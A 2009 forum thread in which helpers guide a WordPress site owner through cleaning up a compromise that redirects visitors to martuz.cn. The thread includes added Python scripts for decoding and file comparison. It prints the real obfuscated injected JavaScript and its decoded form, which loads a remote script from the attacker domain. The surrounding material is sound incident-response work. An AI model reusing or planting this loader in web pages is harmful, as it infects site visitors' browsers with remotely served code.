Author Topic: [SPLIT] garethplu  (Read 13336 times)


May 19, 2009, 11:09:38 pm

garethplu

If someone's website goes to "martuz.cn", what can they do to fix it?

May 20, 2009, 11:00:15 am
Reply #1

MysteryFCM

1. Remove all malicious scripts from ALL files (i.e. restore a backup)
2. Lockdown ALL scripts (JS and PHP etc), and change FTP etc passwords
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 05:47:50 pm
Reply #2

garethplu

Thanks, how can I do that? Is there a step-by-step guide I can follow for someone with basic skills? Will my website host be able to help also?

May 20, 2009, 05:59:58 pm
Reply #3

MysteryFCM

Your host may have a backup, but you shouldn't rely on that. They will, however, be able to reset your FTP etc. passwords for you.

If you don't have a clean copy of the website's files (e.g. stored locally on your computer), then your choices are severely limited, as they are:

1. Download all of the files, and run through their respective source codes, and remove the malicious source code
2. Start the website from scratch
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 06:19:51 pm
Reply #4

garethplu

How do I know what the malicious source code is?

May 20, 2009, 06:31:56 pm
Reply #5

MysteryFCM

Can you post the URL to your website?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 06:34:10 pm
Reply #6

garethplu

http://www.stadiatech.com

The one thing that really puzzles me: I have tried accessing my website from a few computers, and it is only my computer which heads to "martuz.cn". Is that normal?!!!

MysteryFCM: URL disabled

May 20, 2009, 06:41:12 pm
Reply #7

MysteryFCM

Looking at your site's source code shows the following:

Code:
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);

Which decodes to:

Code:
var a = "ScriptEngine", b = "Version()+", j = "", u = navigator.userAgent;
// Runs only for non-Chrome browsers on Windows older than NT 6 (Vista/7),
// once per page (global zrvzts guard) and not when the "miek=1" cookie is set.
if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) &&
    (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A"))) {
  zrvzts = "A";
  // Builds j from ScriptEngineMajorVersion() etc. (IE only) to fingerprint the browser.
  eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
  // The domain is split ("mart" + "uz.cn") so the full name never appears in the file.
  document.write("<script src=//mart" + "uz.cn/vid/?id=" + j + "><\/script>");
}
You're rather lucky here, as long as the script is the same in all files, as all you need to do is search for the string "mart", as the obfuscation is extremely basic.

On your homepage, this script appears just next to the "HEAD" HTML tag.

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
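As an added example (not code from the thread, from hpHosts or from the site in question), the following Python script undoes the colon-for-percent obfuscation shown above and searches a site's files for the two indicators the reply points at: the eval(unescape(...)) wrapper and the string "mart". The sample HTML, the file-suffix list and the function names are constructed for this example; the short payload embedded in the sample is the document.write tail of the script posted above.

```python
"""Decode the colon-escaped JavaScript injection and scan site files for it."""
import re
from pathlib import Path

# JavaScript unescape() forms: %uXXXX (one UTF-16 unit) and %XX (one byte).
_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(text):
    """Emulate JavaScript's unescape(): expand %uXXXX and %XX sequences."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_payload(payload, separator=":"):
    """The injected script stores its body with ':' in place of '%' and restores
    it with .replace(/\\:/g, '%') before eval(unescape(...)). Undo that transform."""
    return js_unescape(payload.replace(separator, "%"))


# The wrapper seen on the page: eval(unescape(('...').replace(X, Y)))
_WRAPPER = re.compile(r"eval\(unescape\(\('([^']*)'\)\.replace\(")

# Plain-text indicators. "mart" is deliberately broad (the domain is split as
# "mart"+"uz.cn", so the full name never appears); review every hit by hand.
INDICATORS = ("eval(unescape(", "mart")


def find_injections(text):
    """Return (line_number, reason, decoded_code_or_snippet) for each suspect line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        wrapper = _WRAPPER.search(line)
        if wrapper:
            findings.append((lineno, "eval(unescape()) wrapper", decode_payload(wrapper.group(1))))
        elif any(marker in line for marker in INDICATORS):
            findings.append((lineno, "indicator string", line.strip()[:120]))
    return findings


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Walk a downloaded copy of the site and map file path -> findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            hits = find_injections(text)
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample page (not the real site's file): a clean head with one
# injected line in the style shown in the thread.
SAMPLE_HTML = """<html>
<head><title>Home</title>
(function(DBCp){var O7l='%';eval(unescape(('d:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b').replace(DBCp,O7l)))})(/\\:/g);
<link rel="stylesheet" href="style.css">
</head>
<body><p>Welcome</p></body></html>
"""

if __name__ == "__main__":
    for lineno, reason, detail in find_injections(SAMPLE_HTML):
        print(f"line {lineno}: {reason}\n    {detail}")
```

Run scan_tree() against a local download of the site rather than the live server, and treat every decoded payload as evidence to keep, not code to execute.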

May 20, 2009, 06:42:21 pm
Reply #8

MysteryFCM

The one thing that really puzzles me: I have tried accessing my website from a few computers, and it is only my computer which heads to "martuz.cn". Is that normal?!!!

It depends entirely on the settings of the browser and the firewall (i.e. if the browser is set to block JavaScript it won't load, and if the firewall is corporately owned, it's likely already set to block this domain).
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 06:49:26 pm
Reply #9

MysteryFCM

Since you're using WordPress, by the way, the main files you need to reinstall and/or clean are your themes (located in /wp-content/themes), though I'd recommend checking ALL of the files just to be on the safe side, as chances are they'll have also uploaded a shell to enable them to re-access your site should the FTP credentials be changed. If you're comfortable doing so, it will be much quicker and much easier to delete the WordPress files and re-upload a clean copy of them (you can obtain the WordPress files from wordpress.org).
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 07:00:55 pm
Reply #10

SysAdMini

I recommend deleting all files at your site and restoring everything from a clean backup. Some PHP files have been added by this malware, for example /images/gifimg.php. I don't recommend sorting out the files manually.

Please change the password of your site and restore your site completely from a backup.
Don't try to fix individual files if you don't know exactly what you are doing.
Ruining the bad guy's day
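The two replies above describe the same triage step from different angles: compare what is on the server with a known-clean copy (a backup, or a fresh WordPress download), and treat anything added or changed, such as the dropped /images/gifimg.php, as suspect. As an added example that is not code from the thread or from WordPress, the Python below does that comparison by path and SHA-256 digest. The demo site it builds in a temporary directory is constructed data; only the file name gifimg.php comes from the thread.

```python
"""Compare a downloaded copy of a compromised site with a clean reference tree."""
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks so large uploads don't fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def compare_trees(live_root, clean_root):
    """Return {'added', 'modified', 'missing'} lists of relative POSIX paths.
    'added' files (e.g. a dropped web shell) and 'modified' files (e.g. a theme
    header with an injected script) are what an analyst reviews first."""
    live_root, clean_root = Path(live_root), Path(clean_root)
    live = {p.relative_to(live_root).as_posix(): p for p in live_root.rglob("*") if p.is_file()}
    clean = {p.relative_to(clean_root).as_posix(): p for p in clean_root.rglob("*") if p.is_file()}
    added = sorted(set(live) - set(clean))
    missing = sorted(set(clean) - set(live))
    modified = sorted(rel for rel in set(live) & set(clean)
                      if sha256_of(live[rel]) != sha256_of(clean[rel]))
    return {"added": added, "modified": modified, "missing": missing}


def build_sample_site():
    """Constructed demo data (not the real site): a clean WordPress-like tree and
    a 'live' copy with one injected theme file and one dropped PHP file."""
    base = Path(tempfile.mkdtemp(prefix="siteclean-"))
    clean, live = base / "clean", base / "live"
    files = {
        "index.php": "<?php require 'wp-blog-header.php';\n",
        "wp-content/themes/default/header.php": "<html><head><title>Site</title></head>\n",
        "wp-content/themes/default/style.css": "body { margin: 0; }\n",
    }
    for root in (clean, live):
        for rel, body in files.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
    # Simulate the compromise: a script appended to the theme header plus a dropped file.
    header = live / "wp-content/themes/default/header.php"
    header.write_text(header.read_text(encoding="utf-8") + "<script>/* injected */</script>\n",
                      encoding="utf-8")
    dropped = live / "images/gifimg.php"          # file name taken from the thread
    dropped.parent.mkdir(parents=True, exist_ok=True)
    dropped.write_text("<?php /* stand-in for a dropped file */ ?>\n", encoding="utf-8")
    return live, clean


if __name__ == "__main__":
    live, clean = build_sample_site()
    for kind, paths in compare_trees(live, clean).items():
        for rel in paths:
            print(f"{kind.upper():9} {rel}")
```

For a real case, point compare_trees() at the downloaded site and at an unpacked copy of the same WordPress version from wordpress.org; files under wp-content/uploads and wp-config.php will legitimately show up as added, so keep a short allow-list of expected differences and scrutinise everything else.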

May 20, 2009, 07:35:50 pm
Reply #11

garethplu

If it comes to it, can I pay someone to fix this and similar problems?

May 20, 2009, 08:09:12 pm
Reply #12

MysteryFCM

Your hosting company would probably be happy to do it for you. If not, post back here and I'll do it for free for you.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 20, 2009, 08:16:07 pm
Reply #13

garethplu

Cheers dude, the world needs more people like you.

I shall speak with the host and see what they say. The RSS no longer works; do you think it's related?

May 20, 2009, 08:17:25 pm
Reply #14

MysteryFCM

More than likely, yes.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net